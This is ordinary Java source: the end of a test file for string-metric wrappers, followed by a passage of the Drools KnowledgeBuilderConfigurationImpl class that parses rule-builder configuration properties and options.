assertSame(tokenizer, forSet.getTokenizer());
assertSame(simplifier, forSet.getSimplifier());
}
}
public static class ForListTest extends StringMetricTest {
@Override
protected boolean toStringIncludesSimpleClassName() {
return false;
}
@Override
protected StringMetric getMetric() {
Metric<List<String>> identity = new Identity<>();
return new ForList(identity, whitespace());
}
@Override
protected T[] getTests() {
return new T[]{
new T(1.0f, "a b c","a b c"),
new T(0.0f, "a b c","a b c d"),
new T(0.0f, "","a b c")
};
}
}
public static class ForListWithSimplifierTest extends StringMetricTest {
@Override
protected boolean toStringIncludesSimpleClassName() {
return false;
}
@Override
protected boolean satisfiesCoincidence() {
return false;
}
@Override
protected StringMetric getMetric() {
Metric<List<String>> identity = new Identity<>();
return new ForListWithSimplifier(identity, toLowerCase(), whitespace());
}
@Override
protected T[] getTests() {
return new T[]{
new T(1.0f, "A B C","a b c"),
new T(0.0f, "a b c","a b c d"),
new T(0.0f, "","a b c")
};
}
}
public static class ForSetTest extends StringMetricTest {
@Override
protected boolean toStringIncludesSimpleClassName() {
return false;
}
@Override
protected StringMetric getMetric() {
Metric<Set<String>> identity = new Identity<>();
return new StringMetrics.ForSet(identity, whitespace());
}
@Override
protected T[] getTests() {
return new T[]{
new T(1.0f, "a b c","a b c"),
new T(0.0f, "a b c","a b c d"),
new T(0.0f, "","a b c")
};
}
}
public static class ForSetWithSimplifierTest extends StringMetricTest {
@Override
protected boolean satisfiesCoincidence() {
return false;
}
@Override
protected boolean toStringIncludesSimpleClassName() {
return false;
}
@Override
protected StringMetric getMetric() {
Metric<Set<String>> identity = new Identity<>();
return new ForSetWithSimplifier(identity, toLowerCase(), whitespace());
}
@Override
protected T[] getTests() {
return new T[]{
new T(1.0f, "A B C","a b c"),
new T(0.0f, "a b c","a b c d"),
new T(0.0f, "","a b c")
};
}
}
public static class ForMultisetTest extends StringMetricTest {
@Override
protected boolean toStringIncludesSimpleClassName() {
return false;
}
@Override
protected StringMetric getMetric() {
Metric<Multiset<String>> identity = new Identity<>();
return new StringMetrics.ForMultiset(identity, whitespace());
}
@Override
protected T[] getTests() {
return new T[]{
new T(1.0f, "a b c","a b c"),
new T(0.0f, "a b c","a b c d"),
new T(0.0f, "","a b c")
};
}
}
public static class ForMultisetWithSimplifierTest extends StringMetricTest {
@Override
protected boolean satisfiesCoincidence() {
return false;
}
@Override
protected boolean toStringIncludesSimpleClassName() {
return false;
}
@Override
protected StringMetric getMetric() {
Metric<Multiset<String>> identity = new Identity<>();
return new StringMetrics.ForMultisetWithSimplifier(identity, toLowerCase(), whitespace());
}
@Override
protected T[] getTests() {
return new T[]{
new T(1.0f, "A B C","a b c"),
new T(0.0f, "a b c","a b c d"),
new T(0.0f, "","a b c")
};
}
}
public static class ForStringTest extends StringMetricTest {
@Override
protected boolean toStringIncludesSimpleClassName() {
return false;
}
@Override
protected StringMetric getMetric() {
Metric<String> identity = new Identity<>();
return new ForString(identity);
}
@Override
protected T[] getTests() {
return new T[]{
new T(1.0f, "a b c","a b c"),
new T(0.0f, "a b c","a b c d"),
new T(0.0f, "","a b c")
};
}
}
public static class ForStringWithSimplifierTest extends StringMetricTest {
@Override
protected boolean satisfiesCoincidence() {
return false;
}
@Override
protected boolean toStringIncludesSimpleClassName() {
return false;
}
@Override
protected StringMetric getMetric() {
Metric<String> identity = new Identity<>();
return new ForStringWithSimplifier(identity, toLowerCase());
}
@Override
protected T[] getTests() {
return new T[]{
new T(1.0f, "A B C","a b c"),
new T(0.0f, "a b c","a b c d"),
new T(0.0f, "","a b c")
};
}
}
}
|
|
/*
* Copyright 2005 Red Hat, Inc. and/or its affiliates.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.drools.compiler.builder.impl;
import java.io.File;
import java.net.URL;
import java.util.Collection;
import java.util.HashMap;
import java.util.Map;
import java.util.Map.Entry;
import java.util.Properties;
import java.util.Set;
import org.drools.compiler.compiler.Dialect;
import org.drools.compiler.compiler.DialectCompiletimeRegistry;
import org.drools.compiler.compiler.DialectConfiguration;
import org.drools.compiler.compiler.DrlParser;
import org.drools.compiler.compiler.PackageRegistry;
import org.drools.compiler.compiler.xml.RulesSemanticModule;
import org.drools.compiler.kie.builder.impl.InternalKieModule.CompilationCache;
import org.drools.compiler.rule.builder.ConstraintBuilder;
import org.drools.compiler.rule.builder.util.AccumulateUtil;
import org.drools.core.base.evaluators.EvaluatorDefinition;
import org.drools.core.base.evaluators.EvaluatorRegistry;
import org.drools.core.definitions.InternalKnowledgePackage;
import org.drools.core.util.ClassUtils;
import org.drools.core.util.ConfFileUtils;
import org.drools.core.util.StringUtils;
import org.drools.core.xml.ChangeSetSemanticModule;
import org.drools.core.xml.DefaultSemanticModule;
import org.drools.core.xml.Handler;
import org.drools.core.xml.SemanticModule;
import org.drools.core.xml.SemanticModules;
import org.drools.core.xml.WrapperSemanticModule;
import org.drools.wiring.api.classloader.ProjectClassLoader;
import org.kie.api.runtime.rule.AccumulateFunction;
import org.kie.internal.builder.KnowledgeBuilderConfiguration;
import org.kie.internal.builder.ResultSeverity;
import org.kie.internal.builder.conf.AccumulateFunctionOption;
import org.kie.internal.builder.conf.AlphaNetworkCompilerOption;
import org.kie.internal.builder.conf.ClassLoaderCacheOption;
import org.kie.internal.builder.conf.DefaultDialectOption;
import org.kie.internal.builder.conf.DefaultPackageNameOption;
import org.kie.internal.builder.conf.DumpDirOption;
import org.kie.internal.builder.conf.EvaluatorOption;
import org.kie.internal.builder.conf.ExternaliseCanonicalModelLambdaOption;
import org.kie.internal.builder.conf.GroupDRLsInKieBasesByFolderOption;
import org.kie.internal.builder.conf.KBuilderSeverityOption;
import org.kie.internal.builder.conf.KnowledgeBuilderOption;
import org.kie.internal.builder.conf.LanguageLevelOption;
import org.kie.internal.builder.conf.MultiValueKnowledgeBuilderOption;
import org.kie.internal.builder.conf.ParallelLambdaExternalizationOption;
import org.kie.internal.builder.conf.ParallelRulesBuildThresholdOption;
import org.kie.internal.builder.conf.ProcessStringEscapesOption;
import org.kie.internal.builder.conf.PropertySpecificOption;
import org.kie.internal.builder.conf.SingleValueKnowledgeBuilderOption;
import org.kie.internal.builder.conf.TrimCellsInDTableOption;
import org.kie.internal.utils.ChainedProperties;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
/**
* This class configures the package compiler.
* Dialects and their DialectConfigurations are handled by the DialectRegistry.
* Normally you will not need to look at this class, unless you want to override the defaults.
*
* This class is not thread safe and it also contains state. Once it is created and used
* in one or more PackageBuilders it should be considered immutable. Do not modify its
* properties while it is being used by a PackageBuilder.
*
* drools.dialect.default = <String>
* drools.accumulate.function.<function name> = <qualified class>
* drools.evaluator.<ident> = <qualified class>
* drools.dump.dir = <String>
* drools.classLoaderCacheEnabled = true|false
* drools.parallelRulesBuildThreshold = <int>
*
* default dialect is java.
* Available preconfigured Accumulate functions are:
* drools.accumulate.function.average = org.kie.base.accumulators.AverageAccumulateFunction
* drools.accumulate.function.max = org.kie.base.accumulators.MaxAccumulateFunction
* drools.accumulate.function.min = org.kie.base.accumulators.MinAccumulateFunction
* drools.accumulate.function.count = org.kie.base.accumulators.CountAccumulateFunction
* drools.accumulate.function.sum = org.kie.base.accumulators.SumAccumulateFunction
*
* drools.parser.processStringEscapes = true|false
*
*
* drools.problem.severity.<ident> = ERROR|WARNING|INFO
*
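* A minimal programmatic equivalent of the properties above (the values are
* only examples):
*
* <pre>
* KnowledgeBuilderConfigurationImpl conf = new KnowledgeBuilderConfigurationImpl();
* conf.setProperty("drools.dialect.default", "java");
* conf.setProperty("drools.dump.dir", "target/drools-dump");
* conf.setProperty("drools.parallelRulesBuildThreshold", "20");
* </pre>
*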
*/
public class KnowledgeBuilderConfigurationImpl
implements
KnowledgeBuilderConfiguration {
public static final String DEFAULT_PACKAGE = "defaultpkg";
private static final int DEFAULT_PARALLEL_RULES_BUILD_THRESHOLD = 10;
private final Map<String, DialectConfiguration> dialectConfigurations = new HashMap<>();
private DefaultDialectOption defaultDialect = DefaultDialectOption.get("java");
private ParallelRulesBuildThresholdOption parallelRulesBuildThreshold = ParallelRulesBuildThresholdOption.get(DEFAULT_PARALLEL_RULES_BUILD_THRESHOLD);
private ClassLoader classLoader;
private ChainedProperties chainedProperties;
private Map<String, AccumulateFunction> accumulateFunctions;
private EvaluatorRegistry evaluatorRegistry;
private SemanticModules semanticModules;
private File dumpDirectory;
private boolean processStringEscapes = true;
private boolean classLoaderCache = true;
private boolean trimCellsInDTable = true;
private boolean groupDRLsInKieBasesByFolder = false;
private boolean externaliseCanonicalModelLambda = true;
private boolean parallelLambdaExternalization = true;
private AlphaNetworkCompilerOption alphaNetworkCompilerOption = AlphaNetworkCompilerOption.DISABLED;
private static final PropertySpecificOption DEFAULT_PROP_SPEC_OPT = PropertySpecificOption.ALWAYS;
private PropertySpecificOption propertySpecificOption = DEFAULT_PROP_SPEC_OPT;
private String defaultPackageName;
private Map<String, ResultSeverity> severityMap;
private LanguageLevelOption languageLevel = DrlParser.DEFAULT_LANGUAGE_LEVEL;
private CompilationCache compilationCache = null;
private static final Logger log = LoggerFactory.getLogger(KnowledgeBuilderConfigurationImpl.class);
/**
* Constructor that sets the parent class loader for the package being built/compiled
*/
public KnowledgeBuilderConfigurationImpl(ClassLoader classLoader) {
init(null, classLoader);
}
/**
* Programmatic properties file, added with least precedence
*/
public KnowledgeBuilderConfigurationImpl(Properties properties) {
init(properties, null);
}
/**
* Programmatic properties file, added with least precedence
*/
public KnowledgeBuilderConfigurationImpl(Properties properties, ClassLoader classLoader) {
init(properties, classLoader);
}
public KnowledgeBuilderConfigurationImpl() {
init(null, null);
}
private void init(Properties properties, ClassLoader classLoader) {
this.classLoader = ProjectClassLoader.getClassLoader(classLoader, getClass(), isClassLoaderCacheEnabled());
init(properties);
}
private void init(Properties properties) {
this.chainedProperties = ChainedProperties.getChainedProperties( getClassLoader() );
if (chainedProperties.getProperty("drools.dialect.java", null) == null) {
// if it couldn't find a configuration for the java dialect using the project class loader,
// it means it could not load the conf file at all (very likely it is running in
// an OSGi environment), so try with the class loader of this class
this.chainedProperties = ChainedProperties.getChainedProperties( getClass().getClassLoader() );
if (this.classLoader instanceof ProjectClassLoader ) {
((ProjectClassLoader) classLoader).setDroolsClassLoader(getClass().getClassLoader());
}
}
if (properties != null) {
this.chainedProperties.addProperties(properties);
}
setProperty(ClassLoaderCacheOption.PROPERTY_NAME,
this.chainedProperties.getProperty(ClassLoaderCacheOption.PROPERTY_NAME,
"true"));
setProperty( TrimCellsInDTableOption.PROPERTY_NAME,
this.chainedProperties.getProperty(TrimCellsInDTableOption.PROPERTY_NAME,
"true"));
setProperty( GroupDRLsInKieBasesByFolderOption.PROPERTY_NAME,
this.chainedProperties.getProperty(GroupDRLsInKieBasesByFolderOption.PROPERTY_NAME,
"false"));
setProperty(PropertySpecificOption.PROPERTY_NAME,
this.chainedProperties.getProperty(PropertySpecificOption.PROPERTY_NAME,
DEFAULT_PROP_SPEC_OPT.toString()));
setProperty(LanguageLevelOption.PROPERTY_NAME,
this.chainedProperties.getProperty(LanguageLevelOption.PROPERTY_NAME,
DrlParser.DEFAULT_LANGUAGE_LEVEL.toString()));
setProperty(ParallelRulesBuildThresholdOption.PROPERTY_NAME,
this.chainedProperties.getProperty(ParallelRulesBuildThresholdOption.PROPERTY_NAME,
String.valueOf(DEFAULT_PARALLEL_RULES_BUILD_THRESHOLD)));
buildDialectConfigurationMap();
this.accumulateFunctions = AccumulateUtil.buildAccumulateFunctionsMap(chainedProperties, getFunctionFactoryClassLoader() );
buildEvaluatorRegistry();
buildDumpDirectory();
buildSeverityMap();
setProperty(ProcessStringEscapesOption.PROPERTY_NAME,
this.chainedProperties.getProperty(ProcessStringEscapesOption.PROPERTY_NAME,
"true"));
setProperty(DefaultPackageNameOption.PROPERTY_NAME,
this.chainedProperties.getProperty(DefaultPackageNameOption.PROPERTY_NAME,
DEFAULT_PACKAGE));
setProperty(ExternaliseCanonicalModelLambdaOption.PROPERTY_NAME,
this.chainedProperties.getProperty(ExternaliseCanonicalModelLambdaOption.PROPERTY_NAME,"true"));
setProperty(ParallelLambdaExternalizationOption.PROPERTY_NAME,
this.chainedProperties.getProperty(ParallelLambdaExternalizationOption.PROPERTY_NAME,"true"));
}
protected ClassLoader getFunctionFactoryClassLoader() {
return getClassLoader();
}
private void buildSeverityMap() {
this.severityMap = new HashMap<String, ResultSeverity>();
Map<String, String> temp = new HashMap<String, String>();
this.chainedProperties.mapStartsWith(temp,
KBuilderSeverityOption.PROPERTY_NAME,
true);
int index = KBuilderSeverityOption.PROPERTY_NAME.length();
for (Map.Entry<String, String> entry : temp.entrySet()) {
String identifier = entry.getKey().trim().substring(index);
this.severityMap.put(identifier,
KBuilderSeverityOption.get(identifier, entry.getValue()).getSeverity());
}
}
public void setProperty(String name,
String value) {
name = name.trim();
if (StringUtils.isEmpty(name)) {
return;
}
if (name.equals(DefaultDialectOption.PROPERTY_NAME)) {
setDefaultDialect(value);
} else if (name.startsWith(AccumulateFunctionOption.PROPERTY_NAME)) {
addAccumulateFunction(name.substring(AccumulateFunctionOption.PROPERTY_NAME.length()),
value);
} else if (name.startsWith(EvaluatorOption.PROPERTY_NAME)) {
this.evaluatorRegistry.addEvaluatorDefinition(value);
} else if (name.equals(DumpDirOption.PROPERTY_NAME)) {
buildDumpDirectory(value);
} else if (name.equals(DefaultPackageNameOption.PROPERTY_NAME)) {
setDefaultPackageName(value);
} else if (name.equals(ProcessStringEscapesOption.PROPERTY_NAME)) {
setProcessStringEscapes(Boolean.parseBoolean(value));
} else if (name.equals(ClassLoaderCacheOption.PROPERTY_NAME)) {
setClassLoaderCacheEnabled(Boolean.parseBoolean(value));
} else if (name.equals(TrimCellsInDTableOption.PROPERTY_NAME)) {
setTrimCellsInDTable(Boolean.parseBoolean(value));
} else if (name.equals(GroupDRLsInKieBasesByFolderOption.PROPERTY_NAME)) {
setGroupDRLsInKieBasesByFolder(Boolean.parseBoolean(value));
} else if (name.startsWith(KBuilderSeverityOption.PROPERTY_NAME)) {
String key = name.substring(name.lastIndexOf('.') + 1);
this.severityMap.put(key, KBuilderSeverityOption.get(key, value).getSeverity());
} else if (name.equals(PropertySpecificOption.PROPERTY_NAME)) {
try {
setPropertySpecificOption(PropertySpecificOption.valueOf(value.toUpperCase()));
} catch (IllegalArgumentException e) {
log.warn("Invalid value " + value + " for option " + PropertySpecificOption.PROPERTY_NAME);
}
} else if (name.equals(LanguageLevelOption.PROPERTY_NAME)) {
try {
setLanguageLevel(LanguageLevelOption.valueOf(value.toUpperCase()));
} catch (IllegalArgumentException e) {
log.warn("Invalid value " + value + " for option " + LanguageLevelOption.PROPERTY_NAME);
}
} else if (name.equals(ParallelRulesBuildThresholdOption.PROPERTY_NAME)) {
setParallelRulesBuildThreshold(Integer.valueOf(value));
} else if (name.equals(ExternaliseCanonicalModelLambdaOption.PROPERTY_NAME)) {
setExternaliseCanonicalModelLambda(Boolean.valueOf(value));
} else if (name.equals(ParallelLambdaExternalizationOption.PROPERTY_NAME)) {
setParallelLambdaExternalization(Boolean.valueOf(value));
} else if (name.equals(AlphaNetworkCompilerOption.PROPERTY_NAME)) {
try {
setAlphaNetworkCompilerOption(AlphaNetworkCompilerOption.determineAlphaNetworkCompilerMode(value.toUpperCase()));
} catch (IllegalArgumentException e) {
log.warn("Invalid value " + value + " for option " + AlphaNetworkCompilerOption.PROPERTY_NAME);
}
} else {
// if the property from the kmodule was not intercepted above, just add it to the chained properties.
Properties additionalProperty = new Properties();
additionalProperty.setProperty(name, value);
chainedProperties.addProperties(additionalProperty);
}
}
public String getProperty(String name) {
name = name.trim();
if (StringUtils.isEmpty(name)) {
return null;
}
if (name.equals(DefaultDialectOption.PROPERTY_NAME)) {
return getDefaultDialect();
} else if (name.equals(DefaultPackageNameOption.PROPERTY_NAME)) {
return getDefaultPackageName();
} else if (name.startsWith(AccumulateFunctionOption.PROPERTY_NAME)) {
int index = AccumulateFunctionOption.PROPERTY_NAME.length();
AccumulateFunction function = this.accumulateFunctions.get(name.substring(index));
return function != null ? function.getClass().getName() : null;
} else if (name.startsWith(EvaluatorOption.PROPERTY_NAME)) {
String key = name.substring(name.lastIndexOf('.') + 1);
EvaluatorDefinition evalDef = this.evaluatorRegistry.getEvaluatorDefinition(key);
return evalDef != null ? evalDef.getClass().getName() : null;
} else if (name.equals(DumpDirOption.PROPERTY_NAME)) {
return this.dumpDirectory != null ? this.dumpDirectory.toString() : null;
} else if (name.equals(ProcessStringEscapesOption.PROPERTY_NAME)) {
return String.valueOf(isProcessStringEscapes());
} else if (name.equals(ClassLoaderCacheOption.PROPERTY_NAME)) {
return String.valueOf(isClassLoaderCacheEnabled());
} else if (name.equals(TrimCellsInDTableOption.PROPERTY_NAME)) {
return String.valueOf(isTrimCellsInDTable());
} else if (name.equals(GroupDRLsInKieBasesByFolderOption.PROPERTY_NAME)) {
return String.valueOf(isGroupDRLsInKieBasesByFolder());
} else if (name.startsWith(KBuilderSeverityOption.PROPERTY_NAME)) {
String key = name.substring(name.lastIndexOf('.') + 1);
ResultSeverity severity = this.severityMap.get(key);
return severity.toString();
} else if (name.equals(LanguageLevelOption.PROPERTY_NAME)) {
return "" + getLanguageLevel();
} else if (name.equals(ParallelRulesBuildThresholdOption.PROPERTY_NAME)) {
return String.valueOf(getParallelRulesBuildThreshold());
} else if (name.equals(ExternaliseCanonicalModelLambdaOption.PROPERTY_NAME)) {
return String.valueOf(isExternaliseCanonicalModelLambda());
} else if (name.equals(ParallelLambdaExternalizationOption.PROPERTY_NAME)) {
return String.valueOf(isParallelLambdaExternalization());
}
return null;
}
public ChainedProperties getChainedProperties() {
return this.chainedProperties;
}
private void buildDialectConfigurationMap() {
DialectConfiguration mvel = ConstraintBuilder.get().createMVELDialectConfiguration();
if (mvel != null) {
mvel.init( this );
dialectConfigurations.put( "mvel", mvel );
}
DialectConfiguration java = ConstraintBuilder.get().createJavaDialectConfiguration();
java.init(this);
dialectConfigurations.put("java", java);
Map<String, String> dialectProperties = new HashMap<String, String>();
this.chainedProperties.mapStartsWith(dialectProperties, "drools.dialect", false);
setDefaultDialect(dialectProperties.get(DefaultDialectOption.PROPERTY_NAME));
}
public void addDialect(String dialectName, DialectConfiguration dialectConf) {
dialectConfigurations.put(dialectName, dialectConf);
}
public DialectCompiletimeRegistry buildDialectRegistry(ClassLoader rootClassLoader,
KnowledgeBuilderConfigurationImpl pkgConf,
PackageRegistry pkgRegistry,
InternalKnowledgePackage pkg) {
DialectCompiletimeRegistry registry = new DialectCompiletimeRegistry();
for (DialectConfiguration conf : this.dialectConfigurations.values()) {
Dialect dialect = conf.newDialect(rootClassLoader, pkgConf, pkgRegistry, pkg);
registry.addDialect(dialect.getId(), dialect);
}
return registry;
}
public String getDefaultDialect() {
return this.defaultDialect.getName();
}
public void setDefaultDialect(String defaultDialect) {
this.defaultDialect = DefaultDialectOption.get(defaultDialect);
}
public DialectConfiguration getDialectConfiguration(String name) {
return this.dialectConfigurations.get(name);
}
public void setDialectConfiguration(String name, DialectConfiguration configuration) {
this.dialectConfigurations.put(name, configuration);
}
public ClassLoader getClassLoader() {
return this.classLoader;
}
public void addSemanticModule(SemanticModule module) {
if (this.semanticModules == null) {
initSemanticModules();
}
this.semanticModules.addSemanticModule(module);
}
public SemanticModules getSemanticModules() {
if (this.semanticModules == null) {
initSemanticModules();
}
return this.semanticModules;
}
public void initSemanticModules() {
this.semanticModules = new SemanticModules();
RulesSemanticModule ruleModule = new RulesSemanticModule("http://ddefault");
this.semanticModules.addSemanticModule(new WrapperSemanticModule("http://drools.org/drools-5.0", ruleModule));
this.semanticModules.addSemanticModule(new WrapperSemanticModule("http://drools.org/drools-5.2", ruleModule));
this.semanticModules.addSemanticModule(new ChangeSetSemanticModule());
// split on each space
String locations[] = this.chainedProperties.getProperty("semanticModules", "").split("\\s");
// load each SemanticModule
for (String moduleLocation : locations) {
// trim leading/trailing spaces and quotes
moduleLocation = moduleLocation.trim();
if (moduleLocation.startsWith("\"")) {
moduleLocation = moduleLocation.substring(1);
}
if (moduleLocation.endsWith("\"")) {
moduleLocation = moduleLocation.substring(0, moduleLocation.length() - 1);
}
if (!moduleLocation.equals("")) {
loadSemanticModule(moduleLocation);
}
}
}
public void loadSemanticModule(String moduleLocation) {
URL url = ConfFileUtils.getURL(moduleLocation, getClassLoader(), getClass());
if (url == null) {
throw new IllegalArgumentException(moduleLocation + " is specified but cannot be found.");
}
Properties properties = ConfFileUtils.getProperties(url);
if (properties == null) {
throw new IllegalArgumentException(moduleLocation + " is specified but cannot be found.");
}
loadSemanticModule(properties);
}
public void loadSemanticModule(Properties properties) {
String uri = properties.getProperty("uri", null);
if (uri == null || uri.trim().equals("")) {
throw new RuntimeException("Semantic Module URI property must not be empty");
}
DefaultSemanticModule module = new DefaultSemanticModule(uri);
for (Entry<Object, Object> entry : properties.entrySet()) {
String elementName = (String) entry.getKey();
//uri is processed above, so skip
if ("uri".equals(elementName)) {
continue;
}
if (elementName == null || elementName.trim().equals("")) {
throw new RuntimeException("Element name must be specified for Semantic Module handler");
}
String handlerName = (String) entry.getValue();
if (handlerName == null || handlerName.trim().equals("")) {
throw new RuntimeException("Handler name must be specified for Semantic Module");
}
Handler handler = (Handler) ClassUtils.instantiateObject(handlerName,
getClassLoader());
if (handler == null) {
throw new RuntimeException("Unable to load Semantic Module handler '" + elementName + ":" + handlerName + "'");
} else {
module.addHandler(elementName,
handler);
}
}
this.semanticModules.addSemanticModule(module);
}
public void addAccumulateFunction(String identifier, String className) {
this.accumulateFunctions.put(identifier,
AccumulateUtil.loadAccumulateFunction(getClassLoader(), identifier,
className));
}
public void addAccumulateFunction(String identifier,
Class<? extends AccumulateFunction> clazz) {
try {
this.accumulateFunctions.put(identifier,
clazz.newInstance());
} catch (InstantiationException e) {
throw new RuntimeException("Error loading accumulate function for identifier " + identifier + ". Instantiation failed for class " + clazz.getName(),
e);
} catch (IllegalAccessException e) {
throw new RuntimeException("Error loading accumulate function for identifier " + identifier + ". Illegal access to class " + clazz.getName(),
e);
}
}
public AccumulateFunction getAccumulateFunction(String identifier) {
return this.accumulateFunctions.get(identifier);
}
// Used by droolsjbpm-tools
public Collection<String> getAccumulateFunctionNames() {
return this.accumulateFunctions.keySet();
}
private void buildEvaluatorRegistry() {
this.evaluatorRegistry = new EvaluatorRegistry( getFunctionFactoryClassLoader() );
Map<String, String> temp = new HashMap<String, String>();
this.chainedProperties.mapStartsWith(temp,
EvaluatorOption.PROPERTY_NAME,
true);
for (Entry<String, String> e : temp.entrySet()) {
String key = e.getKey();
// filtering out unused properties, to avoid failing when an old packagebuilder.conf
// file that defined these is present on the classpath (for example when parsing
// a rule in the Eclipse plugin using an old runtime)
if ("drools.evaluator.equality".equals(key)
|| ("drools.evaluator.comparable".equals(key))) {
continue;
}
this.evaluatorRegistry.addEvaluatorDefinition(e.getValue());
}
}
/**
* Returns the evaluator registry for this package builder configuration.
* @return the evaluator registry
*/
public EvaluatorRegistry getEvaluatorRegistry() {
return this.evaluatorRegistry;
}
/**
* Adds an evaluator definition class to the registry using the
* evaluator class name. The class will be loaded and the corresponding
* evaluator ID will be added to the registry. If an implementation
* for that ID already exists, the new implementation will
* replace the previous one.
*
* @param className the name of the class for the implementation definition.
* The class must implement the EvaluatorDefinition interface.
*/
public void addEvaluatorDefinition(String className) {
this.evaluatorRegistry.addEvaluatorDefinition(className);
}
/**
* Adds an evaluator definition class to the registry. If an implementation
* for that evaluator ID already exists, the new implementation will
* replace the previous one.
*
* @param def the evaluator definition to be added.
*/
public void addEvaluatorDefinition(EvaluatorDefinition def) {
this.evaluatorRegistry.addEvaluatorDefinition(def);
}
private void buildDumpDirectory() {
String dumpStr = this.chainedProperties.getProperty(DumpDirOption.PROPERTY_NAME,
null);
buildDumpDirectory(dumpStr);
}
private void buildDumpDirectory(String dumpStr) {
if (dumpStr != null) {
setDumpDir(new File(dumpStr));
}
}
public File getDumpDir() {
return this.dumpDirectory;
}
public void setDumpDir(File dumpDir) {
if (!dumpDir.isDirectory() || !dumpDir.canWrite() || !dumpDir.canRead()) {
throw new RuntimeException("Drools dump directory is not accessible: " + dumpDir.toString());
}
this.dumpDirectory = dumpDir;
}
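    // Usage sketch (path and variable name are illustrative): pointing the builder at a dump
    // directory so generated sources can be inspected. The directory must already exist and be
    // both readable and writable, otherwise setDumpDir() throws a RuntimeException:
    //   config.setDumpDir(new File("/tmp/drools-dump"));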
public boolean isProcessStringEscapes() {
return processStringEscapes;
}
public void setProcessStringEscapes(boolean processStringEscapes) {
this.processStringEscapes = processStringEscapes;
}
@Deprecated
public boolean isClassLoaderCacheEnabled() {
return classLoaderCache;
}
@Deprecated
public void setClassLoaderCacheEnabled(boolean classLoaderCacheEnabled) {
this.classLoaderCache = classLoaderCacheEnabled;
}
public boolean isTrimCellsInDTable() {
return trimCellsInDTable;
}
public void setTrimCellsInDTable( boolean trimCellsInDTable ) {
this.trimCellsInDTable = trimCellsInDTable;
}
public boolean isGroupDRLsInKieBasesByFolder() {
return groupDRLsInKieBasesByFolder;
}
public void setGroupDRLsInKieBasesByFolder( boolean groupDRLsInKieBasesByFolder ) {
this.groupDRLsInKieBasesByFolder = groupDRLsInKieBasesByFolder;
}
public int getParallelRulesBuildThreshold() {
return parallelRulesBuildThreshold.getParallelRulesBuildThreshold();
}
public void setParallelRulesBuildThreshold(int parallelRulesBuildThreshold) {
this.parallelRulesBuildThreshold = ParallelRulesBuildThresholdOption.get(parallelRulesBuildThreshold);
}
public String getDefaultPackageName() {
return defaultPackageName;
}
public void setDefaultPackageName(String defaultPackageName) {
this.defaultPackageName = defaultPackageName;
}
public LanguageLevelOption getLanguageLevel() {
return languageLevel;
}
public void setLanguageLevel(LanguageLevelOption languageLevel) {
this.languageLevel = languageLevel;
}
public PropertySpecificOption getPropertySpecificOption() {
return propertySpecificOption;
}
public void setPropertySpecificOption(PropertySpecificOption propertySpecificOption) {
this.propertySpecificOption = propertySpecificOption;
}
public boolean isExternaliseCanonicalModelLambda() {
return externaliseCanonicalModelLambda;
}
public void setExternaliseCanonicalModelLambda(boolean externaliseCanonicalModelLambda) {
this.externaliseCanonicalModelLambda = externaliseCanonicalModelLambda;
}
public boolean isParallelLambdaExternalization() {
return parallelLambdaExternalization;
}
public void setParallelLambdaExternalization(boolean parallelLambdaExternalization) {
this.parallelLambdaExternalization = parallelLambdaExternalization;
}
public AlphaNetworkCompilerOption getAlphaNetworkCompilerOption() {
return alphaNetworkCompilerOption;
}
public void setAlphaNetworkCompilerOption(AlphaNetworkCompilerOption alphaNetworkCompilerOption) {
this.alphaNetworkCompilerOption = alphaNetworkCompilerOption;
}
@SuppressWarnings("unchecked")
public <T extends SingleValueKnowledgeBuilderOption> T getOption(Class<T> option) {
if (DefaultDialectOption.class.equals(option)) {
return (T) this.defaultDialect;
} else if (DumpDirOption.class.equals(option)) {
return (T) DumpDirOption.get(this.dumpDirectory);
} else if (ProcessStringEscapesOption.class.equals(option)) {
return (T) (this.processStringEscapes ? ProcessStringEscapesOption.YES : ProcessStringEscapesOption.NO);
} else if (DefaultPackageNameOption.class.equals(option)) {
return (T) DefaultPackageNameOption.get(this.defaultPackageName);
} else if (ClassLoaderCacheOption.class.equals(option)) {
return (T) (this.classLoaderCache ? ClassLoaderCacheOption.ENABLED : ClassLoaderCacheOption.DISABLED);
} else if (TrimCellsInDTableOption.class.equals(option)) {
return (T) (this.trimCellsInDTable ? TrimCellsInDTableOption.ENABLED : TrimCellsInDTableOption.DISABLED);
} else if (GroupDRLsInKieBasesByFolderOption.class.equals(option)) {
return (T) (this.groupDRLsInKieBasesByFolder ? GroupDRLsInKieBasesByFolderOption.ENABLED : GroupDRLsInKieBasesByFolderOption.DISABLED);
} else if (PropertySpecificOption.class.equals(option)) {
return (T) propertySpecificOption;
} else if (LanguageLevelOption.class.equals(option)) {
return (T) languageLevel;
} else if (ExternaliseCanonicalModelLambdaOption.class.equals(option)) {
return (T) (externaliseCanonicalModelLambda ? ExternaliseCanonicalModelLambdaOption.ENABLED : ExternaliseCanonicalModelLambdaOption.DISABLED);
} else if (ParallelLambdaExternalizationOption.class.equals(option)) {
return (T) (parallelLambdaExternalization ? ParallelLambdaExternalizationOption.ENABLED : ParallelLambdaExternalizationOption.DISABLED);
} else if (AlphaNetworkCompilerOption.class.equals(option)) {
return (T) alphaNetworkCompilerOption;
}
return null;
}
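    // Usage sketch (the config variable is illustrative): reading single-value options back from
    // the configuration; boolean flags are surfaced as their option enum constants
    // (ENABLED/DISABLED or YES/NO), for example:
    //   LanguageLevelOption level = config.getOption(LanguageLevelOption.class);
    //   TrimCellsInDTableOption trim = config.getOption(TrimCellsInDTableOption.class);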
@SuppressWarnings("unchecked")
public <T extends MultiValueKnowledgeBuilderOption> T getOption(Class<T> option,
String key) {
if (AccumulateFunctionOption.class.equals(option)) {
return (T) AccumulateFunctionOption.get(key,
this.accumulateFunctions.get(key));
} else if (EvaluatorOption.class.equals(option)) {
return (T) EvaluatorOption.get(key,
this.evaluatorRegistry.getEvaluatorDefinition(key));
} else if (KBuilderSeverityOption.class.equals(option)) {
return (T) KBuilderSeverityOption.get(key,
this.severityMap.get(key));
}
return null;
}
public <T extends MultiValueKnowledgeBuilderOption> Set<String> getOptionKeys(
Class<T> option) {
if (AccumulateFunctionOption.class.equals(option)) {
return this.accumulateFunctions.keySet();
